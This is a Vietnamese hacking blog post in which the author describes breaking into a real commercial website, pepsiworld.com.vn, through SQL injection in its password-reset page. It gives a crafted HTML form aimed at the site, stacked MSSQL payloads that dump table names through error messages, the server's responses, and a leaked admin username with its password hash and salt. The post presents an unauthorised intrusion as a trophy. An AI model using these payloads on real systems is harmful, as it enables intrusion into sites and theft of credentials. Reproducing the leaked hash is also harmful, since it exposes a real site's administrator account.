Trao đổi với tôi

http://www.buidao.com

2/22/10

[Hacking] Xcross87 hack pepsiworld.com.vn

Xem chi tiết tại link: http://docs.google.com/View?id=ddstr8xk_30fjsd9xhj

SQL Injection là cái bug mà muôn đời còn giá trị

Sáng nay đang ngồi trong văn phòng đang kiểm tra security của công ty thì vô tình vào trang này của Việt Nam
Code:
http://pepsiworld.com.vn/
Sau một hồi thì thấy cái lỗi này
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '''.

/ForgotPass_post.asp, line 11
Chà ....để cho nó tiện ngồi viết cái form HTML check cho nó nhanh
Code:
// File name: xcross87_pepsi_com_vn.html
< method="post" name="frmLogin" id="frmLogin" action="http://pepsiworld.com.vn/ForgotPass_post.asp">
< type="hidden" name="REPATH" value="">
< cellspacing="1" cellpadding="3" class="tableBorder" align="center">

< class="tableRow">

  < colspan="2">





<>


 <>< type="text" name="email" id="email" size="150" maxlength="10000" value="">

   < type="hidden" name="AutoLogin" value="false">
   < type="hidden" name="NS" value="false">
 

<>
 < colspan="2" align="right">
  < type="submit" name="Submit" id="Submit" value="Xcross87 Hack chet ne">
  < type="hidden" name="Reset" id="Reset" value="Reset">



hì hì giờ bổn cũ soạn lại thử xem nào

Code:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into xcross87 end--
Kết quả là :
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'AdItem/AdLocation/BoxStyle/Cards/CardsArticle/CardsBackground/CardsChannel/CardsMusic/CayMai/City/ConfigGroup/ConfigItem/ContentBlock/ContentBlockLocation/ContentStatus/Download/DownloadCategory/dtproperties/EntArticle/EntChannel/FAQ/Game/GameComment/GuestbookEntry/Hobby/jindo/JoinPresent/JoinPresentCu2309/MBBrand/MBDownload/MBDownloadType/MBModel/MBM...

/ForgotPass_post.asp, line 11
Hix nhiều vãi lúa ... ngồi check thế này chết toi

thường thì mấy bác chơi CC là cứ substring chỗ nào hay gì gì đó
riêng em, em chơi kiểu cổ điển : MÒ TABLE

mò một hồi thì tìm ra vị trí cần khai thác
Code:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables where table_name like ('U%')select @temp as id into xcross87 end--
Kết quả gì đây
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'UMedia/UMediaAuthor/UMediaSinger/UMember/UMemberBao/UOwnMedia/UserLevel/UserLevelPermission/UTCCode/UTCCode10-8/UTCCode3008/UTCCode5-9/' to a column of data type int.

/ForgotPass_post.asp, line 11
Ta có được mấy cái quan trọng
Code:
UMember/UMemberBao/UserLevel/UserLevelPermission/
Rồi lần lượt tiến hành như mấy bài SQL Injection trước ta thu được kết quả cuối cùng
Code:
Username | Password | SALT = admin | 5AA994062547B593A6D71B05A8ED4B560AD41AF1 | F33009A
Theo Xcross87 hcegroup.net
Được đăng bởi Lúc